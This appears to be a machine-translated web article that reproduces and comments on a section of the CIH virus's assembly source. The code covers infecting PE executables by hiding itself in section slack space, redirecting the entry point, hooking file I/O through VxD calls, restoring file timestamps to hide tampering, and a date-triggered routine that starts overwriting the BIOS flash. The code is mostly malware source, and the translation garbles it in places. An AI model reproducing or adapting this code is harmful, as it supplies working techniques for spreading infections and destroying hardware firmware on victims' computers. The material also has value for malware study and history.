Virus program source code instance analysis-example code of CIH virus [2] can be referred to push eax; block table size
Push edx; edx is the offset of the virus code block table
Push esi; buffer address
The total size of the merged virus code block and virus code block tables must be smaller than or equal to the unused space size.
Inc ecx
Push ecx; Save NumberOfSections + 1
Shl ecx, 03 h; multiply by 8
Push ecx; reserved virus block tablespace
Add ecx, eax
Add ecx, edx; offset of the ecx + File body
Sub ecx, (SizeOfHeaders-@ 9) [esi]
Not ecx
Inc ecx; fill, ecx is the file header size-text offset = unused space
Push ecx
Xchg ecx, eax; ecx is the block table size
Mov eax, (AddressOfEntryPoint-@ 9] [esi]; entry RVA address
Add eax, (ImageBase-@ 9) [esi]; load base address
Mov (OriginalAddressOfEntryPoint-@ 9) [esi], eax; actual entry address after saving the loaded
The unoccupied space is compared with the size of the first part of the virus. if the size is smaller than, only the infected flag is set.
Cmp word ptr [esp], small CodeSizeOfMergeVirusCodeSection
Jl OnlySetInfectedMark
; Read all virus block tables
Mov eax, ebp; read function number
Call edi; read the block table to esi (@ 9)
The following is a complete modification to handle the Winzip self-extracting file error. when you open the self-extracting file,
The virus will not be infected. First, the virus obtains the ToRawData pointer of the 2nd block tables,
Read the data and determine whether the data contains the "WinZip (R )"
Xchg eax, ebp
Push 00000004 h
Pop ecx read 4 bytes
Push edx
Mov edx, (SizeOfScetionTable + PointerToRawData-@ 9] [ebx]
; Edx is the second offset (. rdata)
Add edx, 12 h; add 10 h + 2 h ("WinZip..." at 10 h ....")
Call edi; read 4 bytes to esi
Determine whether to decompress the Winzip file. If yes, no infected sign is set.
Cmp dword ptr [esi], 'pizn'
Je NotSetInfectedMark
Pop edx; edx points to the first address of the block table in the file
; Set the virus code block table
Pop ebx; unused space size
Pop edi; edi = TotalSizeOfVirusCodeSectionTabl
Pop ecx; ecx = NumberOfSections + 1
Push edi
Add edx, ebp; ebp is the block table size
Push edx; file pointer
Add ebp, esi; after ebp points to the block table of the virus data area (the first block)
Push ebp; buffer address
; Set the size of the first virus code block
Lea eax, [ebp + edi-04h]
Mov [eax], ebx
; Set the first virus block
Push ebx; the size of the first part of the virus code
Add edx, edi
Push edx; file pointer
Lea edi, (MyVirusStart-@ 9) [esi]
Push edi; buffer address
; Modify the AddressOfEntryPoint entry to the virus entry
Mov (NewAddressOfEntryPoint-@ 9) [esi], edx; save the new program entry (virus body)
; Set initial data
Lea edx, [esi-SizeOfScetionTable]; edx first minus the length of a block table
Mov ebp, offset VirusSize; ebp is the virus length
Jmp StartToWriteCodeToSections
; Write information to the virus block
LoopOfWriteCodeToSections:
Add edx, SizeOfScetionTable
Mov ebx, (SizeOfRawData-@ 9) [edx]; ebx is the SizeOfRawData (block size) of the table item)
Sub ebx, (VirtualSize-@ 9] [edx]; the value of VirtualSize equals to the unused space of the block.
Jbe EndOfWriteCodeToSections
Push ebx; Size
Sub eax, 08 h
Mov [eax], ebx; write to the virus block table
Mov ebx, (PointerToRawData-@ 9) [edx]; ebx is the physical (actual) offset of the block.
Add ebx, (VirtualSize-@ 9) [edx]; add VirtualSize
Push ebx; ebx points to the file pointer of the unoccupied space.
Push edi; buffer address
Mov ebx, (VirtualSize-@ 9) [edx]
Add ebx, (VirtualAddress-@ 9) [edx]
Add ebx, (ImageBase-@ 9) [esi]; ebx indicates the actual address after the block is loaded.
Mov [eax + 4], ebx; save to virus block table
Mov ebx, [eax]; unused space size of the block
Add (VirtualSize-@ 9) [edx], ebx; add VirtualSize to the table item
; Modify the block attribute of this block table item (read and include initialization data)
Or (Characteristics-@ 9) [edx], 40000040 h
; Start to write code
StartToWriteCodeToSections:
Sub ebp, ebx; virus size-virus block size
If the value is smaller than (after the virus is inserted), set the end character of the virus block table.
Jbe SetVirusCodeSectionTableEndMark
Add edi, ebx; point to the next part of the virus
; Code writing ends
EndOfWriteCodeToSections:
Loop LoopOfWriteCodeToSections
OnlySetInfectedMark:
Mov esp, dr1; only set the infection mark
Jmp WriteVirusCodeToFile; jump to the program that writes the virus to the file to be infected
; Do not set the infection mark
NotSetInfectedMark:
Add esp, 3ch
Jmp CloseFile; go to CloseFile
; Set the virus block table and tag
SetVirusCodeSectionTableEndMark:
; Adjust the virus block code
Add [eax], ebp; correct the last entry of the virus block table
Add [esp + 08 h], ebp
; Set the block table end flag
Xor ebx, ebx
Mov [eax-04h], ebx
When the virus program calls the Vxd command, VMM is interrupted by modifying the 20 th
Lea eax, (LastVxdCallAddress-2-@ 9) [esi]; the last address that calls the Vxd command
Mov cl, VxdCallTableSize; number of Vxd calls used
LoopOfRestoreVxdCallID:
Mov word ptr [eax], 20cdh; in the form of "int 20 H"
; Get the ID number of the Vxd call from VxdCallIDTable and put it in edx
Mov edx, (VxdCallIDTable + (ecx-1) * 04 h-@ 9) [esi]
Mov [eax + 2], edx; put behind "int 20 H"
; VxdCallAddressTable places the difference between the instruction addresses that call Vxd
Movzx edx, byte ptr (VxdCallAddressTable + ecx-1-@ 9) [esi]
Sub eax, edx; eax is the previous call address
Loop LoopOfRestoreVxdCallID; restore other calls
; Write the virus code to the file
WriteVirusCodeToFile:
Mov eax, dr1; dr1 is the esp
Mov ebx, [eax + 10 h]; ebx is the storage file handle that is saved in the stack
Mov edi, [eax]; edi indicates the IFSMgr_Ring0_FileIO call address in the stack
; Write cyclically
LoopOfWriteVirusCodeToFile:
Pop ecx; offset of each segment of the virus code
Jecxz SetFileModificationMark; to zero virus offset
Mov esi, ecx
Mov eax, 0d601h; file write function number (R0_WRITEFILE)
Pop edx; file pointer
Pop ecx; number of bytes to be written
Call edi; VXD call IFSMgr_Ring0_FileIO to write files
Write the virus code, the virus block table, and the new
; File block table, new program entry, infection mark
Jmp LoopOfWriteVirusCodeToFile
Modify the last modification time of the file so that the user does not know that the file has been modified
SetFileModificationMark:
Pop ebx
Pop eax
Stc; set carry flag
Pushf; flag bit into stack
; Close the file
CloseFile:
Xor eax, eax
Mov ah, 0d7h; disable the file function number
Call edi; Vxd call IFSMgr_Ring0_FileIO to close the file
Popf
Pop esi
Jnc IsKillComputer; if the carry sign is 0, it is switched to KillComputer
; Restore file modification time
Mov ebx, edi
Mov ax, 4303 h
Mov ecx, (FileModificationTime-@ 7) [esi]
Mov edi, (FileModificationTime + 2-@ 7) [esi]
Call ebx; Vxd call IFSMgr_Ring0_FileIO to modify the last modification time of the file
; Set the "not busy" sign
DisableOnBusy:
Dec byte ptr (OnBusy-@ 7) [esi]
; Call the original FileSystemApiHook
Prevhook:
Popad; recover all registers
Mov eax, dr0; the first address of the stored original file system Hook program
Jmp [eax]; jump to the original hook to execute
PIFSFunc:
Mov ebx, esp; ebx points to esp to obtain the parameter address of FileSystemApiHookFunction
Push dword ptr [ebx + 20 h + 04 h + 14 h]; input pioreqpir to the stack
Call [ebx + 20 h + 04 h]; call pIFSFunc FSDFnAddr
Pop ecx
Mov [ebx + 1ch], eax; modify the value of eax
; Obtain data from the returned pioreq after pIFSFunc is called
Cmp dword ptr [ebx + 20 h + 04 h + 04 h], 00000024 h
Jne QuitMyVirusFileSystemHook
; Get the modification date and time of the file in DOS mode
Mov eax, [ecx + 28 h]
Mov (FileModificationTime-@ 6) [esi], eax; save the obtained File time and date
; Exit the virus program
QuitMyVirusFileSystemHook:
Popad; recover all registers
Ret; exit from the file hook program set by the virus
Damage the computer BIOS
IsKillComputer:
; Obtain the current date from BIOS CMOS
Mov al, 07 h
Out 70 h, al
In al, 71 h
Xor al, 26 h; determine whether it is the 26th,
For debugging programs, switch to DisableOnBusy
IF DEBUG
Jmp DisableOnBusy
ELSE
Jnz DisableOnBusy; if it is not on the 26th, it will be switched to DisableOnBusy without destruction.
ENDIF
; Start to destroy bios eeprom *
Mov bp, 0cf8h
Lea esi, IOForEEPROM-@ 7 [esi]
; Displays the BIOS page of 000E0000-000 EFFFF address segment, a total of 64 KB
Mov edi, 8000384ch
Mov dx, 0 cfeh
Cli
Call esi
; Displays the BIOS page of 000F0000-000FFFFF address segment, a total of 64 KB
Mov di, 0058 h
Dec edx; and a0fh
Mov word ptr (BooleanCalculateCode-@ 10) [esi], 0f24h
Call esi
Displays the ROM data of the additional 000E0000-000E01FF segment in the BIOS, a total of 512 bytes
And writable BIOS blocks
Lea ebx, EnableEEPROMToWrite-@ 10 [esi]
Mov eax, 0e5555h
Mov ecx, 0e2aaah
Call ebx
Mov byte ptr [eax], 60 h
The above is the analysis of the virus program source code instance-CIH virus [4]. For more information, see PHP Chinese network (www.php1.cn )!
